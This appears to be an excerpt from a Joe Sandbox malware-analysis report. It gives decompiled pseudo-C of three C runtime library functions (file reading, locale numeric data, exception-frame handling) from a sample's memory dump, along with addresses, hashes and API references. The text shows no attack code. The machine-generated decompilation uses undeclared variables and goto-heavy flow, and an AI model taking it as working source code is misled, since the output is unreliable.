0x0090fba5
0x0090fba9
0x0090fbb0

APIs

_free.LIBCMT ref: 0090FAFA

Part of subcall function 0090F884: HeapFree.KERNEL32(00000000,00000000,?,00917BB6,?,00000000,?,?,?,00917E59,?,00000007,?,?,0091834C,?), ref: 0090F89A
Part of subcall function 0090F884: GetLastError.KERNEL32(?,?,00917BB6,?,00000000,?,?,?,00917E59,?,00000007,?,?,0091834C,?,?), ref: 0090F8AC

_free.LIBCMT ref: 0090FB06
_free.LIBCMT ref: 0090FB11
_free.LIBCMT ref: 0090FB1C
_free.LIBCMT ref: 0090FB27
_free.LIBCMT ref: 0090FB32
_free.LIBCMT ref: 0090FB3D
_free.LIBCMT ref: 0090FB48
_free.LIBCMT ref: 0090FB53
_free.LIBCMT ref: 0090FB61

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5b38063060ca25d9c80c8e366f3454f7cbba7e70374b0c02baee98b276c3d070
Instruction ID: ff3579881e11638d18f91228aa85c7b9070d13dd737e686e3502316346feceaa
Opcode Fuzzy Hash: 5b38063060ca25d9c80c8e366f3454f7cbba7e70374b0c02baee98b276c3d070
Instruction Fuzzy Hash: 9121B877900109AFCF15EF94C851EDD7BB9BF48344F008165B9169B561DB31EB45CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0091A7F3 Relevance: 13.8, APIs: 9, Instructions: 301
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0091A7F3(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E00909B49(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E00909B5C( *_t137))) = 9;
						L60:
						_t139 = E00909A82();
						goto L61;
					}
					__eflags = _t198 -  *0x959eb0; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x959cb0 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E00909B49(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E00909B5C(__eflags))) = 0x16;
								E00909A82();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E0091062B(_t154);
								E0090F884(0);
								E0090F884(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E00912F9E(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x959cb0 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x959cb0 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x959cb0 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x959cb0 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x959cb0 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x959cb0 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x959cb0 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E0091AC78(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0);
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E00909B26(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E00909B5C(__eflags))) = 9;
											 *(E00909B49(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x959cb0 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E0091A35E();
												} else {
													_t170 = E0091A664();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E0091A50D(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0x959cb0 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E00909B5C(__eflags))) = 0xc;
									 *(E00909B49(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E0090F884(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x959cb0 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E00909B49(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E00909B5C(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E00909B49(_t246)) =  *_t197 & 0x00000000;
					_t139 = E00909B5C(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

0x0091a7fc
0x0091a800
0x0091a803
0x0091a81d
0x0091a81f
0x0091ab84
0x0091ab84
0x0091ab89
0x0091ab89
0x0091ab91
0x0091ab97
0x0091ab97
0x00000000
0x0091ab97
0x0091a825
0x0091a82b
0x00000000
0x00000000
0x0091a835
0x0091a83b
0x0091a83e
0x0091a841
0x0091a84b
0x0091a84e
0x0091a851
0x0091a855
0x0091a857
0x00000000
0x00000000
0x0091a85d
0x0091a860
0x0091a866
0x0091a880
0x0091a882
0x0091ab80
0x00000000
0x0091ab80
0x0091a888
0x0091a88b
0x00000000
0x00000000
0x0091a891
0x0091a895
0x00000000
0x00000000
0x0091a89b
0x0091a89e
0x0091a8a2
0x0091a8a9
0x0091a8ab
0x0091a8ab
0x0091a8ae
0x0091a903
0x0091a905
0x0091a8cb
0x0091a8d0
0x0091a8d7
0x0091a8dd
0x00000000
0x0091a907
0x0091a909
0x0091a90a
0x0091a90c
0x0091a90f
0x0091a911
0x0091a913
0x0091a915
0x0091a915
0x0091a920
0x0091a922
0x0091a929
0x0091a92e
0x0091a931
0x0091a934
0x0091a936
0x0091a95a
0x0091a962
0x0091a965
0x0091a96c
0x0091a973
0x0091a977
0x0091a979
0x0091a97c
0x0091a983
0x0091a983
0x0091a986
0x0091a988
0x0091a98b
0x0091a990
0x0091a993
0x0091a99c
0x0091a9a0
0x0091a9a3
0x0091a9a5
0x0091a9ab
0x0091a9ad
0x0091a9b6
0x0091a9b7
0x0091a9b9
0x0091a9bd
0x0091a9be
0x0091a9c2
0x0091a9c5
0x0091a9cf
0x0091a9d4
0x0091a9d7
0x0091a9e6
0x0091a9ea
0x0091a9ed
0x0091a9ef
0x0091a9f1
0x0091a9f3
0x0091a9f8
0x0091a9fa
0x0091a9fe
0x0091a9ff
0x0091aa05
0x0091aa0f
0x0091aa10
0x0091aa13
0x0091aa18
0x0091aa1b
0x0091aa2a
0x0091aa2e
0x0091aa31
0x0091aa33
0x0091aa35
0x0091aa37
0x0091aa39
0x0091aa3f
0x0091aa3f
0x0091aa40
0x0091aa4f
0x0091aa52
0x0091aa53
0x0091aa53
0x0091aa37
0x0091aa33
0x0091aa1b
0x0091a9f3
0x0091a9ef
0x0091a9d7
0x0091a9ad
0x0091a9a5
0x0091aa59
0x0091aa5f
0x0091aa61
0x0091aad4
0x0091aad4
0x0091aad8
0x0091aae8
0x0091aaee
0x0091aaf0
0x0091ab4c
0x0091ab4c
0x0091ab54
0x0091ab55
0x0091ab57
0x0091ab70
0x0091ab73
0x0091aab0
0x0091aab1
0x00000000
0x0091aab6
0x0091ab79
0x00000000
0x0091ab79
0x0091ab5e
0x0091ab69
0x00000000
0x0091ab69
0x0091aaf2
0x0091aaf5
0x0091aaf8
0x00000000
0x00000000
0x0091aafa
0x0091aafa
0x0091aafd
0x0091ab00
0x0091ab03
0x0091ab0a
0x0091ab0f
0x0091ab11
0x0091ab15
0x0091ab30
0x0091ab34
0x0091ab35
0x0091ab38
0x0091ab39
0x0091ab45
0x0091ab3b
0x0091ab3b
0x0091ab3b
0x0091ab17
0x0091ab17
0x0091ab17
0x0091ab22
0x0091ab27
0x0091ab2a
0x0091ab2a
0x00000000
0x0091ab0f
0x0091aa66
0x0091aa69
0x0091aa70
0x0091aa75
0x00000000
0x00000000
0x0091aa7e
0x0091aa84
0x0091aa86
0x00000000
0x00000000
0x0091aa88
0x0091aa8c
0x00000000
0x00000000
0x0091aaa0
0x0091aaa6
0x0091aaa8
0x0091aacc
0x0091aacf
0x00000000
0x0091aacf
0x0091aaaa
0x00000000
0x0091a938
0x0091a93d
0x0091a948
0x0091aab7
0x0091aab7
0x0091aab7
0x0091aaba
0x0091aabb
0x00000000
0x0091aac3
0x0091a936
0x0091a905
0x0091a8b0
0x0091a8b3
0x0091a8c7
0x0091a8c9
0x0091a8ea
0x0091a8ed
0x0091a8f0
0x0091a8f3
0x00000000
0x0091a8f3
0x00000000
0x0091a8b5
0x0091a8b5
0x0091a8b8
0x0091a8bb
0x00000000
0x0091a8bb
0x0091a8b3
0x0091a868
0x0091a86d
0x0091a875
0x00000000
0x0091a805
0x0091a80a
0x0091a80d
0x0091a812
0x0091ab9c
0x00000000
0x0091ab9c

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8774487f60b4c7955c2b2e7db4c17351ea79ac2bb608625d493a015c597a7c6f
Instruction ID: da9a4ffcee2ab656bd4a658d43aa9eb6013e24dfb840d7b909d234c810b2e455
Opcode Fuzzy Hash: 8774487f60b4c7955c2b2e7db4c17351ea79ac2bb608625d493a015c597a7c6f
Instruction Fuzzy Hash: 9CC10070B0924D9FDF11DF99D880BEDBBB6AF89320F048059E455AB392C7749D81CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0091797E Relevance: 13.7, APIs: 9, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0091797E(void* __edx, char _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				signed int _t60;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				signed int _t77;
				char _t82;
				void* _t93;
				signed int _t96;
				char _t107;
				char _t108;
				void* _t113;
				char* _t114;
				signed int _t120;
				signed int* _t121;
				char _t123;
				intOrPtr* _t125;
				char* _t130;

				_t113 = __edx;
				_t123 = _a4;
				_v24 = _t123;
				_v20 = 0;
				if( *((intOrPtr*)(_t123 + 0xb0)) != 0 ||  *((intOrPtr*)(_t123 + 0xac)) != 0) {
					_v16 = 1;
					_t93 = E00910679(1, 0x50);
					if(_t93 != 0) {
						_t96 = 0x14;
						memcpy(_t93,  *(_t123 + 0x88), _t96 << 2);
						_t125 = E0091062B(4);
						_t120 = 0;
						_v8 = _t125;
						E0090F884(0);
						if(_t125 != 0) {
							 *_t125 = 0;
							_t123 = _a4;
							if( *((intOrPtr*)(_t123 + 0xb0)) == 0) {
								_t53 =  *0x92c120; // 0x92c174
								 *_t93 = _t53;
								_t54 =  *0x92c124; // 0x959a58
								 *((intOrPtr*)(_t93 + 4)) = _t54;
								_t55 =  *0x92c128; // 0x959a58
								 *((intOrPtr*)(_t93 + 8)) = _t55;
								_t56 =  *0x92c150; // 0x92c178
								 *((intOrPtr*)(_t93 + 0x30)) = _t56;
								_t57 =  *0x92c154; // 0x959a5c
								 *((intOrPtr*)(_t93 + 0x34)) = _t57;
								L19:
								 *_v8 = 1;
								if(_t120 != 0) {
									 *_t120 = 1;
								}
								goto L21;
							}
							_t121 = E0091062B(4);
							_v12 = _t121;
							E0090F884(0);
							_push(_t93);
							if(_t121 != 0) {
								 *_t121 =  *_t121 & 0x00000000;
								_t122 =  *((intOrPtr*)(_t123 + 0xb0));
								_t69 = E00913213(_t113);
								_t16 = _t93 + 4; // 0x4
								_t71 = E00913213(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0xf, _t16,  &_v24);
								_t18 = _t93 + 8; // 0x8
								_t74 = E00913213(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0x10, _t18, 1);
								_t77 = E00913213(_t113,  &_v24, 2,  *((intOrPtr*)(_t123 + 0xb0)), 0xe, _t93 + 0x30, _t122);
								_t22 = _t93 + 0x34; // 0x34
								if((E00913213(_t113,  &_v24, 2, _t122, 0xf, _t22, 0xe) | _t69 | _t71 | _t74 | _t77) == 0) {
									_t114 =  *((intOrPtr*)(_t93 + 8));
									while(1) {
										_t82 =  *_t114;
										if(_t82 == 0) {
											break;
										}
										_t30 = _t82 - 0x30; // -48
										_t107 = _t30;
										if(_t107 > 9) {
											if(_t82 != 0x3b) {
												L16:
												_t114 = _t114 + 1;
												continue;
											}
											_t130 = _t114;
											do {
												_t108 =  *((intOrPtr*)(_t130 + 1));
												 *_t130 = _t108;
												_t130 = _t130 + 1;
											} while (_t108 != 0);
											continue;
										}
										 *_t114 = _t107;
										goto L16;
									}
									_t120 = _v12;
									_t123 = _a4;
									goto L19;
								}
								E00917915(_t93);
								E0090F884(_t93);
								E0090F884(_v12);
								_v16 = _v16 | 0xffffffff;
								L12:
								E0090F884(_v8);
								return _v16;
							}
							E0090F884();
							goto L12;
						}
						E0090F884(_t93);
						return 1;
					}
					return 1;
				} else {
					_t120 = 0;
					_v8 = 0;
					_t93 = 0x92c120;
					L21:
					_t60 =  *(_t123 + 0x80);
					if(_t60 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t123 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t60 | 0xffffffff) == 0) {
							E0090F884( *((intOrPtr*)(_t123 + 0x7c)));
							E0090F884( *(_t123 + 0x88));
						}
					}
					 *((intOrPtr*)(_t123 + 0x7c)) = _v8;
					 *(_t123 + 0x80) = _t120;
					 *(_t123 + 0x88) = _t93;
					return 0;
				}
			}

0x0091797e
0x00917988
0x0091798e
0x00917991
0x0091799a
0x009179b9
0x009179c1
0x009179c7
0x009179da
0x009179db
0x009179e4
0x009179e6
0x009179e9
0x009179ec
0x009179f5
0x00917a06
0x00917a08
0x00917a11
0x00917b60
0x00917b65
0x00917b67
0x00917b6c
0x00917b6f
0x00917b74
0x00917b77
0x00917b7c
0x00917b7f
0x00917b84
0x00917af3
0x00917af9
0x00917afd
0x00917aff
0x00917aff
0x00000000
0x00917afd
0x00917a1e
0x00917a22
0x00917a25
0x00917a2c
0x00917a2f
0x00917a3c
0x00917a42
0x00917a4e
0x00917a53
0x00917a62
0x00917a69
0x00917a76
0x00917a8a
0x00917a94
0x00917aab
0x00917ad7
0x00917ae7
0x00917ae7
0x00917aeb
0x00000000
0x00000000
0x00917adc
0x00917adc
0x00917ae2
0x00917b4e
0x00917ae6
0x00917ae6
0x00000000
0x00917ae6
0x00917b50
0x00917b52
0x00917b52
0x00917b55
0x00917b57
0x00917b5a
0x00000000
0x00917b5e
0x00917ae4
0x00000000
0x00917ae4
0x00917aed
0x00917af0
0x00000000
0x00917af0
0x00917aae
0x00917ab4
0x00917abc
0x00917ac4
0x00917ac8
0x00917acc
0x00000000
0x00917ad4
0x00917a31
0x00000000
0x00917a36
0x009179f8
0x00000000
0x00917a00
0x00000000
0x009179a4
0x009179a4
0x009179a6
0x009179a9
0x00917b01
0x00917b01
0x00917b09
0x00917b0b
0x00917b0b
0x00917b13
0x00917b18
0x00917b1c
0x00917b21
0x00917b2c
0x00917b32
0x00917b1c
0x00917b36
0x00917b3b
0x00917b41
0x00000000
0x00917b41

APIs

_free.LIBCMT ref: 009179EC
_free.LIBCMT ref: 009179F8
_free.LIBCMT ref: 00917B21
_free.LIBCMT ref: 00917B2C

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 0a5389f93791d73c4816004ee39195ef04aae4eefbc932e071226f0ec6f8c1ca
Instruction ID: 576a44d9c6c334db81955e71ce7357f6e494a1735aeb548e0af943cc1e1b6508
Opcode Fuzzy Hash: 0a5389f93791d73c4816004ee39195ef04aae4eefbc932e071226f0ec6f8c1ca
Instruction Fuzzy Hash: 9261BA72A0830A9FDB21DFA4C841BEAF7F9EF84710F144569E956D7281E7709D81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 009087F8 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E009087F8(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t201;
				signed int _t202;
				char _t203;
				signed int _t205;
				signed int _t207;
				signed char* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t214;
				void* _t217;
				signed char* _t220;
				void* _t222;
				void* _t224;
				signed char _t228;
				signed int _t229;
				void* _t231;
				void* _t234;
				void* _t237;
				signed int _t247;
				void* _t250;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr _t253;
				signed int _t254;
				void* _t259;
				void* _t264;
				void* _t265;
				signed int _t269;
				signed char* _t270;
				intOrPtr* _t271;
				signed char _t272;
				signed int _t273;
				signed int _t274;
				intOrPtr* _t276;
				signed int _t277;
				signed int _t278;
				signed int _t283;
				signed int _t290;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed char* _t297;
				signed int _t298;
				signed char _t299;
				signed int* _t301;
				signed char* _t304;
				signed int _t314;
				signed int _t315;
				signed int _t317;
				signed int _t327;
				void* _t329;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;

				_t296 = __edx;
				_push(_t315);
				_t301 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t275 = E00909770(_a8, _a16, _t301);
				_t332 = _t331 + 0xc;
				_v12 = _t275;
				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
					L67:
					_t201 = E0090BE59(_t270, _t275, _t296, _t301, _t315);
					asm("int3");
					_t329 = _t332;
					_t333 = _t332 - 0x38;
					_push(_t270);
					_t271 = _v112;
					__eflags =  *_t271 - 0x80000003;
					if( *_t271 == 0x80000003) {
						return _t201;
					} else {
						_t202 = E0090847C(_t271, _t275, _t296, _t301, _t315, _t301, _t315);
						__eflags =  *(_t202 + 8);
						if( *(_t202 + 8) != 0) {
							__imp__EncodePointer(0);
							_t315 = _t202;
							_t222 = E0090847C(_t271, _t275, _t296, 0, _t315);
							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
								__eflags =  *_t271 - 0xe0434f4d;
								if( *_t271 != 0xe0434f4d) {
									__eflags =  *_t271 - 0xe0434352;
									if( *_t271 != 0xe0434352) {
										_t214 = E00906713(_t296, 0, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
										_t333 = _t333 + 0x1c;
										__eflags = _t214;
										if(_t214 != 0) {
											L84:
											return _t214;
										}
									}
								}
							}
						}
						_t203 = _a16;
						_v28 = _t203;
						_v24 = 0;
						__eflags =  *(_t203 + 0xc);
						if( *(_t203 + 0xc) > 0) {
							_push(_a24);
							E00906646(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
							_t298 = _v40;
							_t334 = _t333 + 0x18;
							_t214 = _v44;
							_v20 = _t214;
							_v12 = _t298;
							__eflags = _t298 - _v32;
							if(_t298 >= _v32) {
								goto L84;
							}
							_t277 = _t298 * 0x14;
							__eflags = _t277;
							_v16 = _t277;
							do {
								_t278 = 5;
								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
								_t334 = _t334 + 0xc;
								__eflags = _v64 - _t217;
								if(_v64 > _t217) {
									goto L83;
								}
								__eflags = _t217 - _v60;
								if(_t217 > _v60) {
									goto L83;
								}
								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t283 = _t220[4];
								__eflags = _t283;
								if(_t283 == 0) {
									L81:
									__eflags =  *_t220 & 0x00000040;
									if(( *_t220 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E00908778(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
										_t298 = _v12;
										_t334 = _t334 + 0x30;
									}
									goto L83;
								}
								__eflags =  *((char*)(_t283 + 8));
								if( *((char*)(_t283 + 8)) != 0) {
									goto L83;
								}
								goto L81;
								L83:
								_t298 = _t298 + 1;
								_t214 = _v20;
								_t277 = _v16 + 0x14;
								_v12 = _t298;
								_v16 = _t277;
								__eflags = _t298 - _v32;
							} while (_t298 < _v32);
							goto L84;
						}
						E0090BE59(_t271, _t275, _t296, 0, _t315);
						asm("int3");
						_push(_t329);
						_t297 = _v184;
						_push(_t271);
						_push(_t315);
						_push(0);
						_t205 = _t297[4];
						__eflags = _t205;
						if(_t205 == 0) {
							L109:
							_t207 = 1;
							__eflags = 1;
						} else {
							_t276 = _t205 + 8;
							__eflags =  *_t276;
							if( *_t276 == 0) {
								goto L109;
							} else {
								__eflags =  *_t297 & 0x00000080;
								_t304 = _v0;
								if(( *_t297 & 0x00000080) == 0) {
									L91:
									_t272 = _t304[4];
									_t317 = 0;
									__eflags = _t205 - _t272;
									if(_t205 == _t272) {
										L101:
										__eflags =  *_t304 & 0x00000002;
										if(( *_t304 & 0x00000002) == 0) {
											L103:
											_t208 = _a4;
											__eflags =  *_t208 & 0x00000001;
											if(( *_t208 & 0x00000001) == 0) {
												L105:
												__eflags =  *_t208 & 0x00000002;
												if(( *_t208 & 0x00000002) == 0) {
													L107:
													_t317 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t297 & 0x00000002;
													if(( *_t297 & 0x00000002) != 0) {
														goto L107;
													}
												}
											} else {
												__eflags =  *_t297 & 0x00000001;
												if(( *_t297 & 0x00000001) != 0) {
													goto L105;
												}
											}
										} else {
											__eflags =  *_t297 & 0x00000008;
											if(( *_t297 & 0x00000008) != 0) {
												goto L103;
											}
